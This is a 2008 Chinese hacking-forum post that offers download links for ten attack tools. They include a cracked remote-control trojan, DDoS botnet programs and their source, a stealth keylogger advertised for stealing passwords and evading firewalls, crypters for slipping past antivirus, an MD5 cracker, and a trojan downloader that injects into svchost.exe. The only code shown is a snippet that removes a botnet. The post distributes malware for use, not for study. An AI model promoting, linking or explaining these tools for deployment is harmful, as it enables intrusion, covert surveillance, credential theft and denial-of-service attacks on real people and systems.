Tmd 2008-6-19 21:01
[06.20]黑客精品软件更新[软件兵器库整理]
[indent][color=#66cc00][size=2]今日更新列表:[/size][/color]
[color=#ff0000]1. [远程控制] PcShare VIP 08613 Cracked By A-new
2. [DDOS] 盘古僵尸1.5更新版
3. [DDOS] 暴风网络压力测试Beta3
4. [程序源代码] 盘古僵尸1.5更新版源代码
5. [程序源代码] 中国制造网络僵尸卸载工具源码
6. [键盘记录] Spytecor Keylogger 1.3.5
7. [免杀软件] whithell crypt
8. [密码破解] Multi MD5 Hash Cracker v0.1
9. [免杀软件] eXpressor 1.6.0.1 注册版
10. [木马后门] 牧马游民VIP专用下载者v1.1 [/color][/indent][img]http://img1.ylmf.com/attachment/Day_080410/148_250883_9a5a7116518b778.gif[/img] 引用:[indent]1. [color=#ff0000]PcShare VIP 08613 Cracked By A-new [/color]
软件大小: 1.16 MB
软件说明:
感谢Lop提供材料,kipass测试,hmily加壳,A-new破解……
程序截图:
[img]http://ab.topzj.com/uu/uu_0806_4/hacktools_11_1_176b71f23990f15.jpg[/img]
[url=http://www.live-share.com/files/329183/pcshare08613_Cracked_By_A-new.rar.html][color=#0000ff][size=4]点击进入下载页面[/size][/color][/url]
2. [color=#ff0000]盘古僵尸1.5更新版 [/color]
软件大小: 447.29 KB
软件说明:
本软件完全免费共享 请勿从事商业用途
盘古僵尸1.5源码重新编译修改
更新内容:
客户端:增加皮肤 增加自定义选择主机功能 修正了部分用词不准确的地方
服务端:增加了CC攻击 修复了GET连接攻击(貌似放源码的时候被取消了) 免杀了 瑞星和金山毒霸
原始服务端大小 37376字节
原始客户端大小 850432字节
注意绑马检测
制作:gt2333588
程序截图:
[img]http://ab.topzj.com/uu/uu_0806_4/hacktools_9_1_3811049b78ef1f4.jpg[/img]
[url=http://www.live-share.com/files/329188/____1.5___.rar.html][color=#0000ff][size=4]点击进入下载页面[/size][/color][/url]
3. [color=#ff0000]暴风网络压力测试Beta3 [/color]
软件大小: 385.65 KB
软件说明:
暴风网络压力测试目前处于测试阶段 此版本为Beta3版
制作:Gt2333588
联系QQ:366686346
更新说明:
08/06/16 发布Beta3版 增加了2组攻击 美化界面 压缩壳FGS2.0
历史更新:
08/06/14 发布Beta2版 优化了界面 UDP改为发送随机UDP数据 增加CC模式
Beta 1 发布暴风网络压力测试Beta1版 软件有UDP SYN TCP ICMP 等攻击模式 具有服务端小 容易免杀等优点
程序截图:
[img]http://ab.topzj.com/uu/uu_0806_4/hacktools_9_1_b5fb4444da7d329.jpg[/img]
[url=http://www.live-share.com/files/329186/________Beta3.rar.html][color=#0000ff][size=4]点击进入下载页面[/size][/color][/url]
4. [color=#ff0000]盘古僵尸1.5更新版源代码[/color]
软件大小: 729.82 KB
软件说明:
软件下载: [url=http://hacktools.topzj.com/read.php?tid=586]http://hacktools.topzj.com/read.php?tid=586[/url]
程序截图:
[img]http://ab.topzj.com/uu/uu_0806_4/hacktools_12_1_1194a126a240383.jpg[/img]
[url=http://www.live-share.com/files/329192/____1.5______.rar.html][color=#0000ff][size=4]点击进入下载页面[/size][/color][/url]
5. [color=#ff0000]中国制造网络僵尸卸载工具源码[/color]
软件大小: 0 kb
软件说明:
void CMyDlg::REMOVE()
{
HKEY remov;
char cnname[256];
if(RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\RemoteServer", &remov)==0)
{
m_returnlist.InsertString(0,"已感染中国制造网络僵尸3.0版本");//显示
Sleep(2000);
m_returnlist.InsertString(0,"卸载过程可能引发系统重起");
SC_HANDLE service, scm;
scm = OpenSCManager(0, 0,SC_MANAGER_CREATE_SERVICE);
service = OpenService(scm,"RemoteServer",SERVICE_ALL_ACCESS | DELETE);
DeleteService(service);
GetSystemDirectory(cnname,MAX_PATH);
DeleteFile("C:\\WINDOWS\\SYSTEM32\\ntserver.dll");
DeleteFile("C:\\WINDOWS\\SYSTEM32\\ntserver.exe");
m_returnlist.InsertString(0,"已成功清除");
}
else if(RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\RemoteStorage", &remov)==0)
{
m_returnlist.InsertString(0,"已感染中国制造网络僵尸2.0版本");//显示
Sleep(2000);
m_returnlist.InsertString(0,"卸载过程可能引发系统重起");
SC_HANDLE service, scm;
scm = OpenSCManager(0, 0,SC_MANAGER_CREATE_SERVICE);
service = OpenService(scm,"RemoteServer",SERVICE_ALL_ACCESS | DELETE);
DeleteService(service);
GetSystemDirectory(cnname,MAX_PATH);
DeleteFile("C:\\WINDOWS\\SYSTEM32\\ntserver.dll");
DeleteFile("C:\\WINDOWS\\SYSTEM32\\ntserver.exe");
m_returnlist.InsertString(0,"已成功清除");
}
else
{
m_returnlist.InsertString(0,"没有发现中国制造网络僵尸服务端程序");
}
return;
}
程序截图:
暂无
[url=http://hacktools.topzj.com/read.php?tid=588][color=#0000ff][size=4]点击进入下载页面[/size][/color][/url] [/indent]
[img]http://img1.ylmf.com/attachment/Day_080410/148_250883_9a5a7116518b778.gif[/img] 引用:[indent]6. [color=#ff0000]Spytecor Keylogger 1.3.5[/color]
软件大小: 1.28 MB
软件说明:
Spytector is the ultimate invisible and undetectable keylogger (spy) software that completely satisfies your PC monitoring and surveillance needs. Spytector server is running in total stealth, undetectable even for advanced users, perfect for monitoring the way your PC is used. The trial version of Spytector is detected by few antivirus applications, even if it's not a trojan or a hacking tool. Spytector is a commercial legitimate keylogger and our customers must be able to use Spytector on their computers in the same time with other security applications, so the version they receive (the full version) will be undetected for all the well known antivirus products.
Our powerful and professional key logger can be used by home and corporate users. All the PC activity is stored in secured encrypted log files. The logs are received either by email or FTP (the log sending procedure is invisible and undetectable for many local firewalls) and afterwards they can be converted in eye catching reports by the in-built Log Viewer. The full colored logs can be saved as RTF or HTML files.
Monitoring features
# keystrokes
# websites
# both sides of chat (AIM, ICQ, Yahoo Messenger, MSN Messenger)
# applications
# keylogger filter (only specific websites/windows are tracked)
# clipboard monitoring
# boot events
# passwords
Server features
# FTP and Email log delivery
# remotely deployable
# option to include Protected Storage passwords in the log
# option to include FireFox passwords in the log
# option to include URL history in the log
# the logs can be received either when they reached a minimum size or at specified day intervals
# the keylogger server works even on Guest account (2k, XP, 2003)
# both small and large icons of the server can be changed
# editable keylogger server name, log name, log size, startup key name
# smart keylogger (BACKSPACE is applied)
# melting option
# warning message option
# option to uninstall the keylogger server after a specifed number of sent logs
# option to uninstall the keylogger server with a specified hotkey
# option to uninstall the keylogger server by checking HTTP
# delay (the server will be active after a specified time or after boot)
Main application features
# built-in log viewer utility
# option to save the settings
# the logs can be saved as RTF and HTML files
# multi-language interface
# editable keylogger server name, log name, log size, startup key name
# all the mentioned server features are editable from the main application
# local logfile retrieving
# skinnable interface
Security features
# totally invisible and undetectable keylogger server
# advanced firewall bypass techniques (the keylogger is undetectable by many local firewalls)
# stealth log delivery (using the default browser or default emailer)
# local encrypted logfiles
# optional encryption for delivered logs
# encrypted keylogger server settings
# keylogger server overwriting protection
# password protected configuration
# password protected uninstallation for the main application
# keylogger server protection against uninstallation
# the keylogger can disable the System Restore feature
# the keylogger can restrict the access to specified websites
# the keylogger can restrict the access to specified applications
程序截图:
[img]http://ab.topzj.com/uu/uu_0806_4/hacktools_10_1_8677c879bea9960.jpg[/img]
[url=http://www.live-share.com/files/329223/Spytecor_Keylogger_1.3.5.rar.html][color=#0000ff][size=4]点击进入下载页面[/size][/color][/url]
7. [color=#ff0000]whithell crypt[/color]
软件大小: 387.52 KB
软件说明:
不知道还免杀不.以前收集的东西~
程序截图:
[img]http://ab.topzj.com/uu/uu_0806_4/hacktools_8_1_051f41cef42a242.jpg[/img]
[url=http://www.live-share.com/files/329225/whithell_crypt.rar.html][color=#0000ff][size=4]点击进入下载页面[/size][/color][/url]
8. [color=#ff0000]Multi MD5 Hash Cracker v0.1[/color]
软件大小: 247.35 KB
软件说明:
一款MD5批量爆破软件.需要自己配置字典.......
程序截图:
[img]http://ab.topzj.com/uu/uu_0806_4/hacktools_23_1_1408ecc87ec8080.jpg[/img]
[url=http://www.live-share.com/files/329227/Multi_MD5_Hash_Cracker_v0.1.rar.html][color=#0000ff][size=4]点击进入下载页面[/size][/color][/url]
9. [color=#ff0000]eXpressor 1.6.0.1 注册版[/color]
软件大小: 814.44 KB
软件说明:
eXpressor 最早是一款使用 LZMA 压缩算法的 EXE 文件压缩工具,拥有极大的压缩比;现在的 eXpressor 已经发展为一款软件保护工具,设计用来保护您的软件免遭破解,可以帮助开发人员添加注册密匙保护,创建试用版或演示版的共享软件。
程序截图:
[img]http://ab.topzj.com/uu/uu_0806_4/hacktools_8_1_406a4aff587aadf.jpg[/img]
[url=http://www.live-share.com/files/329228/eXpressor_1.6.0.1____.rar.html][color=#0000ff][size=4]点击进入下载页面[/size][/color][/url]
10. [color=#ff0000]牧马游民VIP专用下载者v1.1[/color]
软件大小: 169.52 KB
软件说明:
更新说明
[1].循环下载 可设置时间
[2].下载单元代码稳定,智能判断,修正下载文件不存在出现的错误的BUG;
[3].代码免除RAV、KAV、NOD32等等免杀
delphi 7.0 编译
部分代码 参考网络
全API 编写 体积小 压缩后 7KB
注入 svchost.exe 过防火墙 过部分杀软&主动
绝无后门 支持 WIN2K,XP
CODE BY XIAOHUI QQ:112807930
程序截图:
[img]http://ab.topzj.com/uu/uu_0806_4/hacktools_10_1_db8e630f3ef8879.jpg[/img]
[url=http://www.live-share.com/files/329230/VIP___1.1.rar.html][color=#0000ff][size=4]点击进入下载页面[/size][/color][/url] [/indent]